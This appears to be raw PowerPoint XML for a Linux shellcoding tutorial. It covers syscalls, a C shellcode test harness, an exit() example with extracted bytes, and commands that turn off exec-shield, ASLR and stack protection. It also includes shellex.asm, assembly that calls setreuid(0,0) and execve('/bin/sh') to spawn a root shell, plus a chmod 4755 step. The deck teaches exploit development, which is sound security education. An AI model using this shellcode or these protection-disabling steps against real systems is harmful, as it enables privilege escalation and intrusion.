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57" r:id="rId12"/>
    <p:sldId id="259" r:id="rId13"/>
    <p:sldId id="260" r:id="rId14"/>
    <p:sldId id="262" r:id="rId15"/>
    <p:sldId id="263" r:id="rId16"/>
    <p:sldId id="264" r:id="rId17"/>
    <p:sldId id="261" r:id="rId18"/>
    <p:sldId id="265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9A1B-E47E-4D69-B328-C59601EA5CE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e.umbc.edu/portal/help/nasm/sample.shtml" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=_JG4b7E_6-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ividmachines.com/shellcode/shellcode.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nasm.us/doc/nasmdoc2.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.doc.ic.ac.uk/~rh/files/uni/teaching/2011/arch-113/Lab-1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sploi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.std.com/~slanning/asm/syscall_l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NASM and </a:t>
            </a:r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does my program keep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>segfaulting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probably are using an operating system with randomized stack and address space and possibly a protection mechanism that prevents you from executing code on the stack.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Linux based operating systems are not the same, so I present a solution for Fedora that should adapt easily.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4807024"/>
            <a:ext cx="89289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echo 0 &gt; /proc/sys/kernel/exec-shield #turn it off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echo 0 &gt; /proc/sys/kernel/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randomize_va_space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#turn it off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echo 1 &gt; /proc/sys/kernel/exec-shield #turn it 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echo 1 &gt; /proc/sys/kernel/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randomize_va_space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#turn it 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5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nasm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t="31334" r="12291" b="11833"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="683568" y="1484784"/>
            <a:ext cx="789765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1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31334" r="41562" b="37500"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611559" y="1916832"/>
            <a:ext cx="776300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559" y="5268779"/>
            <a:ext cx="64807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assemble a file, you issue a command of the form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nasm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-f &lt;format&gt; &lt;filename&gt; [-o &lt;output&gt;]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For example,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nasm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-f elf myfile.asm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8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  <a:r>
              <a:rPr lang="en-US" dirty="0" err="1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testing shellcode, it is nice to just plop it into a program and let it run. The C program below will be used to test all of our code.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2200" y="3673770"/>
            <a:ext cx="657614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/*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shellcodetest.c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char code[] = "bytecode will go here!";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main(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char **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)();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(*)()) code;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)(*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4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1 - Making a Quick </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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easiest way to begin would be to demonstrate the exit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> due to it's simplicity. Here is some simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code to call exit. Notice the al and XOR trick to ensure that no NULL bytes will get into our code.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3461544"/>
            <a:ext cx="82089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global main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main:       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 ;exit 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syscall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1        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al, 1       ;exit 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syscall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1        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ebx,ebx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 ;zero out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ebx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     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0x80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4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Take the following steps to compile and extract the byte code. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>steve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>hanna@1337b0x:~$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> -f elf exit.asm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steve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>hanna@1337b0x:~$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>exiter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>exit.o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steve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>hanna@1337b0x:~$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>exiter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>
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exiter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:     file format elf32-i386 Disassembly of section .text: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08048080 &lt;main&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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8048080:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>31 c0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax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8048082:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b0 01</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    $0x1,%al  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8048084:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  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8048086:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd 80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                  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    $0x80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bytes we need are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>31  c0 b0 01 31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cd 80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Replace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>the code at the top with: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char code[] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>“\x31\xc0\xb0\x01\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>\x80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Now, run the program. We have a successful piece of shellcode! One can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>trace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>the program to ensure that it is calling exit.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6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GNU linker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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - The GNU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SYNOPSIS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>objfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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DESCRIPTION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> combines a number of object and archive files, relocates their data and ties up symbol references. Usually the last step in compiling a program is to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>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03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stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>randomizeation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sysctl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–w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kernel.randomize_va_space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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Turn off stack projection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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–z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execstack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fno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-stack-protection –g –o shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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shellcodetest.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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5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Example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https://www.youtube.com/watch?v=_JG4b7E_6-E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http://www.csee.umbc.edu/portal/help/nasm/sample.shtml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http://www.doc.ic.ac.uk/~rh/files/uni/teaching/2011/arch-113/Lab-1.pdf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http://www.nasm.us/doc/nasmdoc2.html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www.vividmachines.com/shellcode/shellcode.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>http://www.tenouk.com/Bufferoverflowc/Bufferoverflow5.html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8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0600" y="63500"/>
            <a:ext cx="4572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;By Steve Hanna</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>;shanna@uiuc.edu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>;http://www.vividmachines.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>;Linux Shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>;shellex.asm shellcode example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>;this shellcode fires up a shell with root access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>[SECTION .text]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>global _start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_start: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xor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eax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eax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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> al, 70              ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setreuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 70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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xor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ebx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ebx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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xor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ecx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ecx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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 0x80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jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> short ender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>        starter:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>        pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>                 ;get the address of the string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xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>eax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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> [ebx+7 ], al        ;put a NULL where the N is in the string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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> [ebx+8 ], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>       ;put the address of the string to where the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>                                ;AAAA is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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> [ebx+12], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>       ;put 4 null bytes into where the BBBB is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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> al, 11              ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> 11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>        lea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>, [ebx+8]        ;load the address of where the AAAA was</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>        lea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>, [ebx+12]       ;load the address of the NULLS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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> 0x80                ;call the kernel, WE HAVE A SHELL!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>        ender:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>        call starter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db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> '/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>shNAAAABBBB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/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202949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remove it, however, we must use command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 4755 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellex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5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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Shellcoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example 1 and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shellcoding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security, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in its most literal sense, means writing code that will return a remote shell when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meaning of shellcode has evolved, it now represents any byte code that will be inserted into an exploit to accomplish a desired task.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227106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hy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>should I write my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tons of repositories all around the internet for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcoding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Namely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>metasploit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project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>seems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to be the best. 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/>
              <a:t>an exploit can be difficult, what happens when all of the prewritten blocks of code cease to work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You need to write your own! Hopefully this tutorial will give you a good head start.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149451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do I need to know before I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decent understanding of x86 assembly, C, and knowledge of the Linux and Windows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3913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differences between windows shellcode and Linux shellcode?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Linux, unlike windows, provides a direct way to interface with the kernel through the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 0x80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> interface.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complete listing of the Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> table can be found 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on the other hand, does not have a direct kernel interface.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must be interfaced by loading the address of the function that needs to be executed from a DLL (Dynamic Link Library).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01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differences between windows shellcode and Linux shellcode?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key difference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of the functions found in windows will vary from OS version to OS version while the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 0x80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> numbers will remain constant.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programmers did this so that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could make any change needed to the kernel without any hassle; </a:t>
            </a:r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/>
              <a:t>on the contrary has fixed numbering system for all kernel level functions, and if they were to change, there would be a million angry programmers (and a lot of broken code).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
